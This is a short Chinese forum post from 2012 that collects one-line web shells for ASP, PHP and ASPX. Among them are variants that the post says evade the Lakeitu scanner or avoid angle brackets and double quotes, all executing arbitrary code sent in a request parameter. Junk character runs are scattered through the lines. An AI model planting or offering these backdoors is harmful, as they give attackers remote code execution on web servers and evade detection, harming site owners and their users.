asp一句话 <%execute(request("1"))%> 6 m q2 R+ c- I' ?# B+ Q1 r2 Q6 {
4 {7 Z+ ~" p1 P1 D" r2 S. f
php一句话 <?php eval($_POST[1]);?> ' h5 ?' M# q6 D% a. R+ Z% \0 A
! E4 p7 \ v3 Z. v0 O* F# `1 H
aspx一句话
! V; i, ^. w" K' \9 W/ j5 A# B8 C. L& n# F2 Z( X
<script language="C#" runat="server">
- x5 @0 m+ G2 I0 n6 D0 m
, x! r" K) D$ {$ K. x' WWebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");0 j4 B, A5 P x \
0 z% ~$ z8 S) T
</script>
& n T4 [! ~* v3 a. ^( D0 }& e" p
3 c2 d9 H6 k7 V! d可以躲过雷客图的一句话。8 h. u) E7 o* K7 M0 {
; E* @2 l7 {" `! U M <%6 @, J: c; x4 C8 T% ~6 i# s
, W5 V; ^2 j) A$ i& W
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")) S$ P, o4 @" R4 D5 C' m
" D/ S- m7 ^1 I+ K% A& T
ms.Language="VBScript"3 m7 v+ R0 H ~ s5 f3 x' T
5 ^/ s3 i1 V% Q8 i1 f$ m! X3 e) ~ ms.AddObject "Response", Response
( Q0 C2 r+ M: ?# a
8 j: ~% c% c8 `" X+ e ms.AddObject "request", request
; v+ A9 M- O7 [% Y5 W
1 A, m3 T; n3 m" z0 U5 ]0 [1 C ms.ExecuteStatement("ev"&"al(request(""1""))")
, _& [" W3 u) g9 r' W
$ `7 v1 M* `0 ?2 g- j3 V' W: T %>
3 @9 N9 }+ m* r7 d, R8 a9 B. a, H S
8 b: j6 u1 h; M+ Z0 r: ~2 e' X/ C 不用'<,>'的asp一句话 s1 c0 G/ Y+ Z( e2 w$ }$ M5 t
% X- S+ m8 G- x% _ <script language=VBScript runat=server>execute request("1")</script>
5 ^4 ]* r; D' `. ~+ P4 |% k' [5 M. L$ A5 ?3 b2 ~" q
不用双引号的一句话。, i6 S' I- z$ q/ A' [& R
9 N; J1 f+ S& P. ]4 v6 q <%eval request(chr(35))%>
/ F5 {' n; V4 [) k" t |
发表于 2012-9-23 14:36:09
收藏
支持
反对